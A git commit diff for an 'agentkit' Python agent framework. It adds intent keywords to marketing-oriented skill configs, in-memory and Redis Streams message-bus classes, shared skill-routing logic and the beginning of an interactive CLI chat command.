merge: integrate feat/agentkit-phase8-chat-adaptive (chat/gui commands + GUI mode)

Restores agentkit chat, agentkit gui CLI commands, onboarding wizard,
and GUI mode (AGENTKIT_GUI_MODE) with static file serving.
Resolves merge conflicts in orchestrator.py, app.py, tools/__init__.py, shell.py.
This commit is contained in:
chiguyong 2026-06-10 07:44:06 +08:00
commit 7874e875af
58 changed files with 8794 additions and 42 deletions

View File

@ -9,6 +9,14 @@ supported_tasks:
max_concurrency: 3 max_concurrency: 3
custom_handler: "configs.geo_handlers.handle_citation_task" custom_handler: "configs.geo_handlers.handle_citation_task"
intent:
keywords: ["引用检测", "引用分析", "AI引用", "citation", "引用率", "被引用"]
description: "用户需要检测品牌在各AI平台回答中的引用情况"
examples:
- "检测我们的品牌在AI平台的引用情况"
- "分析品牌引用率"
- "哪些AI平台引用了我们"
input_schema: input_schema:
type: object type: object
properties: properties:

View File

@ -87,7 +87,7 @@ prompt:
examples: "" examples: ""
llm: llm:
model: "deepseek" model: "default"
temperature: 0.7 temperature: 0.7
max_tokens: 4000 max_tokens: 4000

View File

@ -7,6 +7,14 @@ supported_tasks:
- deai_process - deai_process
max_concurrency: 2 max_concurrency: 2
intent:
keywords: ["去AI化", "去ai", "去AI", "人性化", "改写", "deai", "humanize", "自然化"]
description: "用户需要将AI生成的文本改写为更自然、人类化的表达"
examples:
- "帮我把这篇文章去AI化"
- "让这段文字更自然"
- "改写得像人写的"
input_schema: input_schema:
type: object type: object
required: required:
@ -61,7 +69,7 @@ prompt:
examples: "" examples: ""
llm: llm:
model: "deepseek" model: "default"
temperature: 0.9 temperature: 0.9
max_tokens: 8000 max_tokens: 8000

View File

@ -7,6 +7,14 @@ supported_tasks:
- geo_optimize - geo_optimize
max_concurrency: 2 max_concurrency: 2
intent:
keywords: ["GEO优化", "SEO优化", "内容优化", "优化文章", "geo", "seo", "optimize"]
description: "用户需要对文章进行GEO/SEO优化提升在AI搜索引擎中的可见性"
examples:
- "帮我优化这篇文章的SEO"
- "GEO优化一下"
- "提升文章在AI搜索中的排名"
input_schema: input_schema:
type: object type: object
required: required:
@ -64,7 +72,7 @@ prompt:
examples: "" examples: ""
llm: llm:
model: "deepseek" model: "default"
temperature: 0.5 temperature: 0.5
max_tokens: 8000 max_tokens: 8000

View File

@ -9,6 +9,14 @@ supported_tasks:
max_concurrency: 3 max_concurrency: 3
custom_handler: "configs.geo_handlers.handle_monitor_task" custom_handler: "configs.geo_handlers.handle_monitor_task"
intent:
keywords: ["效果追踪", "监测", "监控", "monitor", "追踪", "排名变化"]
description: "用户需要监测品牌引用量、情感、排名变化"
examples:
- "监测品牌引用变化"
- "追踪效果"
- "品牌排名变化"
input_schema: input_schema:
type: object type: object
required: required:

View File

@ -8,6 +8,14 @@ supported_tasks:
max_concurrency: 2 max_concurrency: 2
custom_handler: "configs.geo_handlers.handle_schema_task" custom_handler: "configs.geo_handlers.handle_schema_task"
intent:
keywords: ["Schema", "结构化数据", "JSON-LD", "schema", "schema优化"]
description: "用户需要识别Schema缺失维度生成结构化数据建议"
examples:
- "帮我优化Schema"
- "生成JSON-LD结构化数据"
- "Schema有什么可以改进的"
input_schema: input_schema:
type: object type: object
required: required:

View File

@ -0,0 +1,14 @@
"""AgentKit Bus - Agent 间通信基础设施"""
from agentkit.bus.message import AgentMessage
from agentkit.bus.protocol import MessageBus
from agentkit.bus.memory_bus import InMemoryMessageBus
from agentkit.bus.redis_bus import RedisMessageBus, create_message_bus
__all__ = [
"AgentMessage",
"MessageBus",
"InMemoryMessageBus",
"RedisMessageBus",
"create_message_bus",
]

View File

@ -0,0 +1,143 @@
"""InMemoryMessageBus — 基于 asyncio.Queue 的内存消息总线。
用于开发和测试行为与 Redis 实现一致
"""
from __future__ import annotations
import asyncio
import logging
from typing import Any, Callable, Awaitable
from agentkit.bus.message import AgentMessage
logger = logging.getLogger(__name__)
class InMemoryMessageBus:
    """In-process message bus backed by one ``asyncio.Queue`` per subscribed agent.

    Point-to-point messages are queued for the recipient and delivered by a
    single consumer task per agent to every handler registered for that agent.
    Broadcasts call every registered handler directly. ``request()`` waits for
    a later message carrying the same ``correlation_id``.
    """

    def __init__(self) -> None:
        self._subscribers: dict[str, list[Callable[[AgentMessage], Awaitable[None]]]] = {}
        self._pending_requests: dict[str, asyncio.Future[AgentMessage]] = {}
        self._queues: dict[str, asyncio.Queue[AgentMessage]] = {}
        # One consumer task per agent. Holding the reference keeps the task
        # from being garbage-collected and lets unsubscribe() cancel it.
        self._consumer_tasks: dict[str, asyncio.Task[None]] = {}
        # correlation_id -> message_id of the outgoing request, so that the
        # request itself is never mistaken for its own reply.
        self._request_ids: dict[str, str] = {}

    def _resolve_pending(self, message: AgentMessage) -> None:
        """Complete the pending request future that *message* replies to, if any."""
        correlation_id = message.correlation_id
        if not correlation_id or message.message_id == correlation_id:
            return
        if self._request_ids.get(correlation_id) == message.message_id:
            # This is the original request (caller supplied its own
            # correlation_id), not a reply.
            return
        future = self._pending_requests.get(correlation_id)
        if future is not None and not future.done():
            future.set_result(message)

    async def _dispatch(self, agent_name: str, message: AgentMessage) -> None:
        """Call every handler registered for *agent_name*, logging handler errors."""
        # Iterate over a snapshot: a handler may subscribe/unsubscribe.
        for handler in list(self._subscribers.get(agent_name, ())):
            try:
                await handler(message)
            except Exception as e:
                logger.warning(f"Handler error for {agent_name}: {e}")

    async def publish(self, message: AgentMessage) -> None:
        """Publish *message*; a message without a recipient is broadcast."""
        if message.is_broadcast:
            await self.broadcast(message)
            return

        recipient = message.recipient
        if recipient:
            queue = self._queues.get(recipient)
            if queue is not None:
                # Normal path: the recipient's consumer task delivers it.
                await queue.put(message)
            else:
                # No queue for this recipient: call any handlers directly.
                await self._dispatch(recipient, message)

        # A published reply completes the matching request() call.
        self._resolve_pending(message)

    async def subscribe(
        self,
        agent_name: str,
        handler: Callable[[AgentMessage], Awaitable[None]],
    ) -> None:
        """Register *handler* for messages addressed to *agent_name*.

        The first subscription for an agent creates its queue and starts its
        consumer task; later subscriptions only add another handler.
        """
        self._subscribers.setdefault(agent_name, []).append(handler)
        if agent_name not in self._queues:
            self._queues[agent_name] = asyncio.Queue()

        task = self._consumer_tasks.get(agent_name)
        if task is None or task.done():
            self._consumer_tasks[agent_name] = asyncio.create_task(
                self._consume_queue(agent_name),
            )

    async def _consume_queue(
        self,
        agent_name: str,
        handler: Callable[[AgentMessage], Awaitable[None]] | None = None,
    ) -> None:
        """Deliver queued messages for *agent_name* until cancelled.

        When *handler* is given only that handler is called (legacy call
        shape); otherwise every handler currently registered for the agent
        receives each message.
        """
        queue = self._queues.get(agent_name)
        if queue is None:
            return
        while True:
            try:
                message = await queue.get()
                if handler is None:
                    await self._dispatch(agent_name, message)
                else:
                    try:
                        await handler(message)
                    except Exception as e:
                        logger.warning(f"Handler error for {agent_name}: {e}")
            except asyncio.CancelledError:
                break

    async def unsubscribe(self, agent_name: str) -> None:
        """Remove all handlers for *agent_name* and stop its consumer task."""
        self._subscribers.pop(agent_name, None)
        self._queues.pop(agent_name, None)
        task = self._consumer_tasks.pop(agent_name, None)
        if task is None or task.done():
            return
        task.cancel()
        # A handler may unsubscribe its own agent; a task cannot await itself.
        if task is not asyncio.current_task():
            try:
                await task
            except asyncio.CancelledError:
                pass

    async def request(
        self,
        message: AgentMessage,
        timeout: float = 30.0,
    ) -> AgentMessage:
        """Publish *message* and wait for a reply with the same correlation id.

        Args:
            message: Request to send. If it has no ``correlation_id`` its
                ``message_id`` is used.
            timeout: Seconds to wait for the reply.

        Returns:
            The first message published with the request's ``correlation_id``.

        Raises:
            TimeoutError: No reply arrived within *timeout* seconds.
        """
        if not message.correlation_id:
            message.correlation_id = message.message_id
        correlation_id = message.correlation_id

        future: asyncio.Future[AgentMessage] = asyncio.get_running_loop().create_future()
        self._pending_requests[correlation_id] = future
        self._request_ids[correlation_id] = message.message_id

        try:
            await self.publish(message)
            return await asyncio.wait_for(future, timeout=timeout)
        except asyncio.TimeoutError as exc:
            raise TimeoutError(
                f"Request {message.correlation_id} timed out after {timeout}s"
            ) from exc
        finally:
            self._pending_requests.pop(correlation_id, None)
            self._request_ids.pop(correlation_id, None)

    async def broadcast(self, message: AgentMessage) -> None:
        """Deliver *message* to every handler of every subscribed agent."""
        # A broadcast never carries a recipient.
        message.recipient = None

        # Snapshot both levels so handlers may (un)subscribe while we iterate.
        for agent_name, handlers in list(self._subscribers.items()):
            for handler in list(handlers):
                try:
                    await handler(message)
                except Exception as e:
                    logger.warning(f"Broadcast handler error for {agent_name}: {e}")

        self._resolve_pending(message)

    async def health_check(self) -> bool:
        """Always healthy: there is no external backend to probe."""
        return True

    @property
    def backend_type(self) -> str:
        """Identifier of this backend."""
        return "memory"

View File

@ -0,0 +1,54 @@
"""AgentMessage — Agent 间通信消息模型。"""
from __future__ import annotations
import uuid
from dataclasses import dataclass, field
from datetime import datetime, timezone
from typing import Any
def _new_message_id() -> str:
    """Return the first 12 characters of a random UUID4 string."""
    return str(uuid.uuid4())[:12]


def _utc_now_iso() -> str:
    """Return the current UTC time as an ISO-8601 string."""
    return datetime.now(timezone.utc).isoformat()


@dataclass
class AgentMessage:
    """Message exchanged between agents.

    A message is point-to-point when ``recipient`` is set and a broadcast when
    ``recipient`` is ``None``. ``correlation_id`` links a reply to its request.
    """

    message_id: str = field(default_factory=_new_message_id)
    sender: str = ""
    recipient: str | None = None  # None means broadcast
    topic: str = ""
    payload: dict[str, Any] = field(default_factory=dict)
    timestamp: str = field(default_factory=_utc_now_iso)
    correlation_id: str | None = None  # request/response correlation

    def to_dict(self) -> dict[str, Any]:
        """Return the message as a plain dict (the payload object is not copied)."""
        names = (
            "message_id",
            "sender",
            "recipient",
            "topic",
            "payload",
            "timestamp",
            "correlation_id",
        )
        return {name: getattr(self, name) for name in names}

    @classmethod
    def from_dict(cls, data: dict[str, Any]) -> AgentMessage:
        """Build a message from *data*; missing keys become empty values or ``None``."""
        lookup = data.get
        kwargs: dict[str, Any] = {
            "message_id": lookup("message_id", ""),
            "sender": lookup("sender", ""),
            "recipient": lookup("recipient"),
            "topic": lookup("topic", ""),
            "payload": lookup("payload", {}),
            "timestamp": lookup("timestamp", ""),
            "correlation_id": lookup("correlation_id"),
        }
        return cls(**kwargs)

    @property
    def is_broadcast(self) -> bool:
        """True when the message has no recipient."""
        target = self.recipient
        return target is None

View File

@ -0,0 +1,61 @@
"""MessageBus Protocol — Agent 间通信抽象层。"""
from __future__ import annotations
from typing import Any, Callable, Awaitable, Protocol as TypingProtocol, runtime_checkable
from agentkit.bus.message import AgentMessage
@runtime_checkable
class MessageBus(TypingProtocol):
    """Structural protocol for the inter-agent communication bus.

    Three communication modes are supported:

    - point-to-point: ``publish()`` with a recipient set
    - broadcast: ``publish()`` without a recipient, or ``broadcast()``
    - request/response: ``request()`` waits for a reply that carries the
      same ``correlation_id``
    """

    async def publish(self, message: AgentMessage) -> None:
        """Publish a message; when ``message.recipient`` is None it is broadcast."""

    async def subscribe(
        self,
        agent_name: str,
        handler: Callable[[AgentMessage], Awaitable[None]],
    ) -> None:
        """Subscribe to messages; ``handler`` is called when a message arrives."""

    async def unsubscribe(self, agent_name: str) -> None:
        """Cancel the subscription for ``agent_name``."""

    async def request(
        self,
        message: AgentMessage,
        timeout: float = 30.0,
    ) -> AgentMessage:
        """Send a message and wait for the reply (request/response mode).

        Args:
            message: The request message.
            timeout: Timeout in seconds.

        Returns:
            The response message.

        Raises:
            TimeoutError: No response was received before the timeout.
        """

    async def broadcast(self, message: AgentMessage) -> None:
        """Broadcast a message to all subscribers."""

    async def health_check(self) -> bool:
        """Report whether the bus is healthy."""

View File

@ -0,0 +1,268 @@
"""RedisMessageBus — 基于 Redis Streams 的消息总线。
使用 XADD/XREADGROUP 实现可靠消息传递支持消费者组
消息确认和死信队列
"""
from __future__ import annotations
import asyncio
import json
import logging
from typing import Any, Callable, Awaitable
from agentkit.bus.message import AgentMessage
from agentkit.bus.memory_bus import InMemoryMessageBus
logger = logging.getLogger(__name__)
_STREAM_PREFIX = "agentkit:bus:"
_DEAD_LETTER_SUFFIX = ":dead"
class RedisMessageBus:
    """Message bus backed by Redis Streams, one stream per agent.

    Messages are appended with XADD and read with XREADGROUP by one consumer
    task per subscribed agent. Messages that cannot be processed are copied
    to a per-agent dead-letter stream and acknowledged.
    """

    def __init__(
        self,
        redis_url: str = "redis://localhost:6379/0",
        consumer_group: str = "agentkit_bus",
        max_retries: int = 3,
    ) -> None:
        self._redis_url = redis_url
        self._consumer_group = consumer_group
        # NOTE(review): stored but not consulted anywhere in this class;
        # failed messages go to the dead-letter stream on the first failure.
        self._max_retries = max_retries
        self._redis: Any = None
        self._subscribers: dict[str, list[Callable[[AgentMessage], Awaitable[None]]]] = {}
        self._pending_requests: dict[str, asyncio.Future[AgentMessage]] = {}
        self._consumer_tasks: dict[str, asyncio.Task] = {}
        # correlation_id -> message_id of the outgoing request, so that the
        # request itself is never mistaken for its own reply.
        self._request_ids: dict[str, str] = {}

    async def _get_redis(self) -> Any:
        """Return the Redis client, creating it on first use."""
        if self._redis is None:
            import redis.asyncio as aioredis
            self._redis = aioredis.from_url(self._redis_url, decode_responses=True)
        return self._redis

    def _stream_key(self, agent_name: str) -> str:
        """Stream key holding messages addressed to *agent_name*."""
        return f"{_STREAM_PREFIX}{agent_name}"

    def _dead_letter_key(self, agent_name: str) -> str:
        """Stream key holding failed messages for *agent_name*."""
        return f"{_STREAM_PREFIX}{agent_name}{_DEAD_LETTER_SUFFIX}"

    def _resolve_pending(self, message: AgentMessage) -> None:
        """Complete the pending request future that *message* replies to, if any."""
        correlation_id = message.correlation_id
        if not correlation_id or message.message_id == correlation_id:
            return
        if self._request_ids.get(correlation_id) == message.message_id:
            # This is the original request (caller supplied its own
            # correlation_id), not a reply.
            return
        future = self._pending_requests.get(correlation_id)
        if future is not None and not future.done():
            future.set_result(message)

    async def publish(self, message: AgentMessage) -> None:
        """Append *message* to the recipient's stream; broadcast if it has none.

        Raises:
            Exception: Whatever the Redis client raises when XADD fails
                (logged, then re-raised).
        """
        if message.is_broadcast:
            await self.broadcast(message)
            return

        redis = await self._get_redis()
        stream_key = self._stream_key(message.recipient)
        data = message.to_dict()

        try:
            await redis.xadd(stream_key, {"data": json.dumps(data)})
        except Exception as e:
            logger.error(f"Failed to publish message to {stream_key}: {e}")
            raise

        # Same-process shortcut: a reply published through this instance
        # completes the matching request() immediately.
        self._resolve_pending(message)

    async def subscribe(
        self,
        agent_name: str,
        handler: Callable[[AgentMessage], Awaitable[None]],
    ) -> None:
        """Register *handler* for *agent_name* and make sure its consumer runs."""
        self._subscribers.setdefault(agent_name, []).append(handler)

        task = self._consumer_tasks.get(agent_name)
        if task is None or task.done():
            self._consumer_tasks[agent_name] = asyncio.create_task(
                self._consume_stream(agent_name),
            )

    async def _ensure_group(self, redis: Any, stream_key: str) -> None:
        """Create the consumer group for *stream_key* if it does not exist yet."""
        try:
            await redis.xgroup_create(
                stream_key, self._consumer_group, id="0", mkstream=True,
            )
        except Exception as e:
            # Redis answers BUSYGROUP when the group already exists; that is
            # the expected case. Anything else is worth surfacing, but the
            # consumer loop below still retries on its own.
            if "BUSYGROUP" not in str(e):
                logger.warning(
                    f"Failed to create consumer group for {stream_key}: {e}"
                )

    async def _consume_stream(self, agent_name: str) -> None:
        """Read messages for *agent_name* from its stream until cancelled."""
        redis = await self._get_redis()
        stream_key = self._stream_key(agent_name)
        await self._ensure_group(redis, stream_key)

        while True:
            try:
                results = await redis.xreadgroup(
                    groupname=self._consumer_group,
                    consumername=agent_name,
                    streams={stream_key: ">"},
                    count=10,
                    block=1000,
                )
                for _stream_name, messages in results or ():
                    for msg_id, fields in messages:
                        try:
                            data = json.loads(fields.get("data", "{}"))
                            message = AgentMessage.from_dict(data)
                            # A reply that arrives over the stream (for
                            # example from another process) must complete
                            # the waiting request() call.
                            self._resolve_pending(message)
                            for handler in list(self._subscribers.get(agent_name, [])):
                                try:
                                    await handler(message)
                                except Exception as e:
                                    logger.warning(f"Handler error for {agent_name}: {e}")
                            # Acknowledge message
                            await redis.xack(stream_key, self._consumer_group, msg_id)
                        except Exception as e:
                            logger.warning(f"Failed to process message {msg_id}: {e}")
                            await self._handle_failed_message(
                                redis, stream_key, msg_id, fields, agent_name,
                            )
            except asyncio.CancelledError:
                break
            except Exception as e:
                logger.error(f"Consumer error for {agent_name}: {e}")
                # Back off briefly so a broken connection does not spin.
                await asyncio.sleep(1)

    async def _handle_failed_message(
        self,
        redis: Any,
        stream_key: str,
        msg_id: str,
        fields: dict,
        agent_name: str,
    ) -> None:
        """Copy a failed message to the dead-letter stream and acknowledge it."""
        dead_key = self._dead_letter_key(agent_name)
        try:
            await redis.xadd(dead_key, fields)
            await redis.xack(stream_key, self._consumer_group, msg_id)
            logger.warning(f"Message {msg_id} moved to dead letter queue")
        except Exception as e:
            logger.error(f"Failed to move message to dead letter: {e}")

    async def unsubscribe(self, agent_name: str) -> None:
        """Remove all handlers for *agent_name* and stop its consumer task."""
        self._subscribers.pop(agent_name, None)
        task = self._consumer_tasks.pop(agent_name, None)
        if not task:
            return
        task.cancel()
        # A handler may unsubscribe its own agent; a task cannot await itself.
        if task is not asyncio.current_task():
            try:
                await task
            except asyncio.CancelledError:
                pass

    async def request(
        self,
        message: AgentMessage,
        timeout: float = 30.0,
    ) -> AgentMessage:
        """Publish *message* and wait for a reply with the same correlation id.

        Args:
            message: Request to send. If it has no ``correlation_id`` its
                ``message_id`` is used.
            timeout: Seconds to wait for the reply.

        Returns:
            The reply message.

        Raises:
            TimeoutError: No reply arrived within *timeout* seconds.
        """
        if not message.correlation_id:
            message.correlation_id = message.message_id
        correlation_id = message.correlation_id

        future: asyncio.Future[AgentMessage] = asyncio.get_running_loop().create_future()
        self._pending_requests[correlation_id] = future
        self._request_ids[correlation_id] = message.message_id

        try:
            await self.publish(message)
            return await asyncio.wait_for(future, timeout=timeout)
        except asyncio.TimeoutError as exc:
            raise TimeoutError(
                f"Request {message.correlation_id} timed out after {timeout}s"
            ) from exc
        finally:
            self._pending_requests.pop(correlation_id, None)
            self._request_ids.pop(correlation_id, None)

    async def broadcast(self, message: AgentMessage) -> None:
        """Append *message* to the stream of every agent subscribed on this instance."""
        message.recipient = None
        redis = await self._get_redis()
        payload = json.dumps(message.to_dict())

        # Snapshot the names: subscriptions may change while we await Redis.
        for agent_name in list(self._subscribers):
            stream_key = self._stream_key(agent_name)
            try:
                await redis.xadd(stream_key, {"data": payload})
            except Exception as e:
                logger.error(f"Failed to broadcast to {agent_name}: {e}")

        self._resolve_pending(message)

    async def health_check(self) -> bool:
        """Return True when Redis answers PING, False on any error."""
        try:
            redis = await self._get_redis()
            return bool(await redis.ping())
        except Exception:
            return False

    @property
    def backend_type(self) -> str:
        """Identifier of this backend."""
        return "redis_streams"
def create_message_bus(
    backend: str = "memory",
    redis_url: str = "redis://localhost:6379/0",
    consumer_group: str = "agentkit_bus",
    max_retries: int = 3,
) -> InMemoryMessageBus | RedisMessageBus:
    """Create a message bus instance.

    Args:
        backend: "memory" or "redis". Any value other than "redis" yields
            the in-memory bus.
        redis_url: Redis connection URL.
        consumer_group: Redis consumer group name.
        max_retries: Maximum number of retries per message.

    Returns:
        A ``RedisMessageBus`` when requested and constructible, otherwise an
        ``InMemoryMessageBus``.
    """
    wants_redis = backend == "redis"
    if wants_redis:
        try:
            # Importing here only verifies that the redis package is present.
            import redis.asyncio as aioredis  # noqa: F401

            redis_bus = RedisMessageBus(
                redis_url=redis_url,
                consumer_group=consumer_group,
                max_retries=max_retries,
            )
            logger.info(f"MessageBus backend: redis_streams ({redis_url})")
            return redis_bus
        except Exception as exc:
            # Fall through to the in-memory bus below.
            logger.warning(
                f"Failed to initialise RedisMessageBus ({exc}), "
                f"falling back to InMemoryMessageBus"
            )

    memory_bus = InMemoryMessageBus()
    logger.info("MessageBus backend: memory")
    return memory_bus

View File

View File

@ -0,0 +1,168 @@
"""Shared skill routing logic for GUI and CLI chat.
Extracts the duplicated skill routing, @skill: prefix parsing,
and prompt assembly into a single module used by both chat routes.
"""
from __future__ import annotations
import logging
import re
from dataclasses import dataclass, field
from typing import Any
logger = logging.getLogger(__name__)
# Skill names: a lowercase letter or digit first, then up to 63 more
# lowercase letters, digits, hyphens or underscores.
_SKILL_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9_-]{0,63}$")


def validate_skill_name(name: str) -> str:
    """Return *name* stripped and lowercased after checking it is a valid skill name.

    Raises:
        ValueError: The normalized name does not match the skill-name pattern.
    """
    candidate = name.strip().lower()
    if _SKILL_NAME_RE.match(candidate) is not None:
        return candidate
    raise ValueError(
        f"Invalid skill name '{name}': must match [a-z0-9][a-z0-9_-]{{0,63}}"
    )
@dataclass
class SkillRoutingResult:
    """Outcome of routing one user message to a skill (or to the defaults)."""

    # --- matched skill, if any ---
    skill_name: str | None = None
    skill_config: Any = None
    skill_tools: list = field(default_factory=list)

    # --- message text with any @skill: prefix removed ---
    clean_content: str = ""

    # --- parameters to execute with ---
    system_prompt: str | None = None
    tools: list = field(default_factory=list)
    model: str = "default"
    agent_name: str | None = None

    # --- how the match was made ---
    matched: bool = False
    match_method: str | None = None
    match_confidence: float = 0.0
def parse_skill_prefix(content: str) -> tuple[str | None, str]:
    """Split an ``@skill:name`` prefix off a user message.

    The skill reference ends at the first whitespace character of any kind
    (space, tab, newline, full-width space), so a message such as
    ``"@skill:foo\\nhello"`` yields ``("foo", "hello")``.

    Args:
        content: Raw user message.

    Returns:
        ``(skill_name, clean_content)``. ``skill_name`` is ``None`` when the
        message does not start with ``@skill:``, in which case
        ``clean_content`` is *content* unchanged. With the prefix present,
        ``skill_name`` is the text after ``@skill:`` (possibly empty) and
        ``clean_content`` is the stripped remainder of the message.
    """
    prefix = "@skill:"
    if not content.startswith(prefix):
        return None, content

    # sep=None splits on any run of whitespace, not just an ASCII space.
    head, *rest = content.split(None, 1)
    explicit_skill = head[len(prefix):].strip()
    clean = rest[0].strip() if rest else ""
    return explicit_skill, clean
def build_skill_system_prompt(skill_config) -> str | None:
    """Join the non-empty prompt sections of *skill_config* into one system prompt.

    Sections are taken in a fixed order (identity, context, instructions,
    constraints, output_format) and separated by a blank line. Returns
    ``None`` when there is no config, no prompt, or no non-empty section.
    """
    if not skill_config:
        return None
    if not skill_config.prompt:
        return None

    section_order = ("identity", "context", "instructions", "constraints", "output_format")
    sections = [skill_config.prompt.get(section) for section in section_order]
    present = [text for text in sections if text]
    if not present:
        return None
    return "\n\n".join(present)
def _apply_skill_match(
    result: SkillRoutingResult,
    skill_registry: Any,
    skill_name: str,
    method: str | None,
    confidence: float,
) -> None:
    """Look up *skill_name* and record it on *result* as the matched skill.

    All registry lookups happen before *result* is touched, so a failed
    lookup raises without leaving a half-filled result behind.
    """
    skill = skill_registry.get(skill_name)
    config = skill.config
    skill_tools = skill.tools or []

    result.skill_name = skill_name
    result.skill_config = config
    result.skill_tools = skill_tools
    result.matched = True
    result.match_method = method
    result.match_confidence = confidence


async def resolve_skill_routing(
    content: str,
    skill_registry: Any,
    intent_router: Any,
    default_tools: list,
    default_system_prompt: str | None,
    default_model: str = "default",
    default_agent_name: str = "default",
    agent_tool_registry: Any = None,
    session_id: str = "",
) -> SkillRoutingResult:
    """Resolve skill routing for a user message.

    Shared entry point for the GUI WebSocket chat and the CLI chat. An
    explicit ``@skill:name`` prefix is tried first; if that does not match,
    the intent router is asked to pick among skills that declare intent
    keywords, and a match needs a confidence of at least 0.5.

    Args:
        content: Raw user message, possibly starting with ``@skill:name``.
        skill_registry: Registry providing ``get(name)`` and ``list_skills()``.
        intent_router: Router providing an async ``route(input_data=, skills=)``.
        default_tools: Tools used when no skill matches, and the agent tool
            set when *agent_tool_registry* is not given.
        default_system_prompt: Prompt used when no skill matches or the
            matched skill defines no prompt sections.
        default_model: Model used unless the matched skill's ``llm`` config
            names one.
        default_agent_name: Agent name used when no skill matches.
        agent_tool_registry: Optional registry whose ``list_tools()``
            supplies the agent tools merged with the skill's tools.
        session_id: Only used in log messages.

    Returns:
        A ``SkillRoutingResult`` with all execution parameters set. When no
        skill matched, ``skill_name`` and ``skill_config`` are ``None``.
    """
    result = SkillRoutingResult()

    # Parse @skill: prefix
    explicit_skill, clean_content = parse_skill_prefix(content)
    result.clean_content = clean_content

    if explicit_skill:
        logger.info(f"Session {session_id}: explicit skill reference: {explicit_skill}")

    # Try explicit skill match
    if explicit_skill and skill_registry:
        try:
            _apply_skill_match(result, skill_registry, explicit_skill, "explicit", 1.0)
            logger.info(f"Session {session_id}: using explicit skill '{explicit_skill}'")
        except Exception as e:
            logger.warning(f"Session {session_id}: explicit skill '{explicit_skill}' not found: {e}")

    # Try IntentRouter if no explicit match
    if not result.matched and skill_registry and intent_router:
        try:
            # Building the candidate list sits inside the try so that a skill
            # without intent configuration cannot abort routing altogether.
            routable_skills = [
                skill
                for skill in skill_registry.list_skills()
                if getattr(
                    getattr(getattr(skill, "config", None), "intent", None),
                    "keywords",
                    None,
                )
            ]
            if routable_skills:
                routing_result = await intent_router.route(
                    input_data={"content": clean_content},
                    skills=routable_skills,
                )
                if routing_result and routing_result.confidence >= 0.5:
                    skill_name = routing_result.matched_skill
                    try:
                        _apply_skill_match(
                            result,
                            skill_registry,
                            skill_name,
                            routing_result.method,
                            routing_result.confidence,
                        )
                        logger.info(
                            f"Session {session_id}: routed to skill '{skill_name}' "
                            f"via {routing_result.method} (confidence={routing_result.confidence})"
                        )
                    except Exception as e:
                        logger.warning(f"Session {session_id}: skill '{skill_name}' found by router but not in registry: {e}")
        except Exception as e:
            logger.warning(f"Skill routing failed for session {session_id}: {e}")

    # Determine execution parameters
    if result.matched and result.skill_config:
        skill_prompt = build_skill_system_prompt(result.skill_config)
        result.system_prompt = skill_prompt or default_system_prompt

        # Merge skill tools with agent tools, deduplicating by name; skill
        # tools come first so they win on a name clash.
        agent_tools = agent_tool_registry.list_tools() if agent_tool_registry else default_tools
        seen_names: set[str] = set()
        merged_tools = []
        for tool in [*result.skill_tools, *(agent_tools or ())]:
            if tool.name not in seen_names:
                seen_names.add(tool.name)
                merged_tools.append(tool)
        result.tools = merged_tools

        llm_config = result.skill_config.llm
        result.model = llm_config.get("model", default_model) if llm_config else default_model
        result.agent_name = result.skill_name
    else:
        # Make sure no skill identity leaks into the default route.
        result.skill_name = None
        result.skill_config = None
        result.system_prompt = default_system_prompt
        result.tools = default_tools
        result.model = default_model
        result.agent_name = default_agent_name

    return result

422
src/agentkit/cli/chat.py Normal file
View File

@ -0,0 +1,422 @@
"""Chat command — interactive terminal chat with an Agent.
Runs a lightweight in-process server and opens a REPL-style chat session.
No external server or Docker needed.
Usage:
agentkit chat # Start chatting (auto-onboard if no config)
agentkit chat --model deepseek/deepseek-chat # Use specific model
"""
from __future__ import annotations
import asyncio
import os
from typing import Any
import typer
from rich import print as rprint
from rich.panel import Panel
from rich.prompt import Prompt
from rich.markdown import Markdown
from rich.live import Live
from rich.text import Text
from rich.console import Group
def chat(
    model: str = typer.Option("default", "--model", "-m", help="LLM model to use (e.g. deepseek/deepseek-chat)"),
    agent_name: str = typer.Option("default", "--agent", "-a", help="Agent name to chat with"),
    config: str | None = typer.Option(None, "--config", "-c", help="Path to agentkit.yaml"),
    system_prompt: str | None = typer.Option(None, "--system-prompt", "-s", help="Custom system prompt"),
    no_stream: bool = typer.Option(False, "--no-stream", help="Disable token streaming"),
):
    """Start an interactive chat session with an Agent."""
    # The command body is synchronous; the chat loop itself is a coroutine.
    chat_session = _chat_async(model, agent_name, config, system_prompt, no_stream)
    asyncio.run(chat_session)
# Phrases that introduce the agent's name in the SOUL.md identity section.
_NAME_PREFIXES = ("我是", "我叫", "我的名字是")
# Characters that end the name: CJK/ASCII comma and period, enumeration
# comma, space and newline.
_NAME_TERMINATORS = ("，", "。", "、", ",", ".", " ", "\n")


def _extract_display_name(identity_text: str | None, fallback: str) -> str:
    """Pull a short display name out of an identity text, else return a fallback.

    The name is the text following the first matching introduction phrase,
    cut at the earliest terminator character. When no phrase matches, the
    identity text itself (or *fallback* if it is empty) is returned.
    """
    text = identity_text or fallback
    for prefix in _NAME_PREFIXES:
        if prefix not in text:
            continue
        name_part = text.split(prefix, 1)[1].strip()
        cut_points = [
            pos
            for pos in (name_part.find(sep) for sep in _NAME_TERMINATORS)
            if pos != -1
        ]
        if cut_points:
            name_part = name_part[: min(cut_points)]
        return name_part or fallback
    return text


async def _chat_async(
    model: str,
    agent_name: str,
    config_arg: str | None,
    system_prompt: str | None,
    no_stream: bool,
) -> None:
    """Run the interactive chat session.

    Steps: locate (or create through onboarding) the config, load it and any
    sibling ``.env``, build the in-process gateway, memory store, session,
    tools, skills and intent router, print the banner, run the REPL loop, and
    finally append a short summary of the conversation to the daily memory
    file.

    Args:
        model: Model name, or "default" to resolve one from the config.
        agent_name: Agent name used for the session and as display fallback.
        config_arg: Optional explicit path to the config file.
        system_prompt: Optional custom base system prompt.
        no_stream: When True, print the full answer at once instead of
            streaming tokens.

    Raises:
        typer.Exit: Onboarding was cancelled, so there is no configuration.
    """
    import logging
    from pathlib import Path

    from agentkit.cli.onboarding import run_onboarding
    from agentkit.server.config import ServerConfig, find_config_path

    # ── Onboarding check ──────────────────────────────────────────
    config_path = find_config_path(config_arg)
    if config_path is None:
        config_path = run_onboarding(config_arg=config_arg)
        if config_path is None:
            rprint("[red]Onboarding cancelled. Cannot start chat without configuration.[/red]")
            raise typer.Exit(code=1)

    # ── Load config ───────────────────────────────────────────────
    rprint(f"[dim]Loading config from {config_path}[/dim]")

    # Load .env that sits next to the config file
    dotenv = Path(config_path).parent / ".env"
    if dotenv.exists():
        _load_dotenv(str(dotenv))

